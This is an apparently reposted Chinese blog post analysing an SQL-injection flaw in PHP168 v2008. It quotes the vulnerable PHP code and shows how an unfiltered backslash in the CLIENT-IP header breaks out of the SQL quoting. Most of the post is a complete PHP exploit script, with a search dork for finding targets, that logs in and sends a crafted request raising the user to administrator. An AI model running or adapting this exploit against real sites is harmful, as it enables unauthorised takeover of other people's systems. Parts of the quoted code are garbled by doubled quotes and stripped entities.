简单分析下这个漏洞
common.inc.php
if($_SERVER[''HTTP_CLIENT_IP'']){
$onlineip=$_SERVER[''HTTP_CLIENT_IP''];
}elseif($_SERVER[''HTTP_X_FORWARDED_FOR'']){
$onlineip=$_SERVER[''HTTP_X_FORWARDED_FOR''];
}else{
$onlineip=$_SERVER[''REMOTE_ADDR''];
}
$onlineip = preg_replace("/^([\d\.]+).*/", "", filtrate($onlineip));
//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip
看一下filtrate函数是怎么处理的
function.inc.php
function filtrate($msg){
$msg = str_replace(''&'',''&'',$msg);
$msg = str_replace('' '','' '',$msg);
$msg = str_replace(''"'',''"'',$msg);
$msg = str_replace("''",'''''',$msg);
$msg = str_replace("<","<",$msg);
$msg = str_replace(">",">",$msg);
$msg = str_replace("\t"," ",$msg);
$msg = str_replace("\r","",$msg);
$msg = str_replace(" "," ",$msg);
return $msg;
}过滤了''"<等,但是没有处理\
common.inc.php
if($usr_oltime>30||!$usr_oltime){
$usr_oltime>600 && $usr_oltime=600;
include(PHP168_PATH."php168/level.php");
if( isset($memberlevel[$lfjdb[groupid]]) ){
$SQL=",groupid=8";
$lfjdb[money]=get_money($lfjuid);
foreach( $memberlevel AS $key=>$value){
if($lfjdb[money]>=$value){
$SQL=",groupid=$key";
}
}
}else{
$SQL="";
}
$db->query("UPDATE {$pre}memberdata SET lastvist=''$timestamp'',lastip=''$onlineip'',oltime=oltime+''$usr_oltime''$SQL WHERE uid=''$lfjuid''");
//因为这个地方是拼接字符串的形式,所以可以使用\来转义'',然后利用$usr_oltime来注射:)另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:
UPDATE {$pre}memberdata SET lastvist=''$timestamp'',lastip=''[\]'',oltime=oltime+''[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]''$SQL WHERE uid=''$lfjuid''最后给个EXP:
#!/usr/bin/php
print_r(''
+---------------------------------------------------------------------------+
Php168 <= v2008 update user access exploit
from:
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
'');
/**
* works regardless of php.ini settings
*/
if ($argc < 5) {
print_r(''
+---------------------------------------------------------------------------+
Usage: php ''.$argv[0].'' host path user pass
host: target server (ip/hostname)
path: path to php168
user: login username
pass: login password
Example:
php ''.$argv[0].'' localhost /php168/
+---------------------------------------------------------------------------+
'');
exit;
}
error_reporting(7);
ini_set(''max_execution_time'', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$resp = send();
preg_match(''/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/'', $resp, $cookie);
if ($cookie)
if (strpos(send(), ''puret_t'') !== false)
exit("Expoilt Success!\nYou Are Admin Now!\n");
else
exit("Exploit Failed!\n");
else
exit("Exploit Failed!\n");
function rands($length = 8)
{
$hash = '''';
$chars = ''ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for ($i = 0; $i < $length; $i++)
$hash .= $chars[mt_rand(0, $max)];
return $hash;
}
function send()
{
global $host, $path, $user, $pass, $cookie;
if ($cookie) {
$cookie[1] .= '';USR=''.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";
$cmd = '''';
$message = "POST ".$path."member/userinfo.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: ryat\\\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n";
$message .= "Cookie: ".$cookie[1]."\r\n\r\n";
$message .= $cmd;
} else {
$cmd = "username=$user&password=$pass&step=2";
$message = "POST ".$path."login.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
}
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '''';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
阅读(774) | 评论(0) | 转发(0) |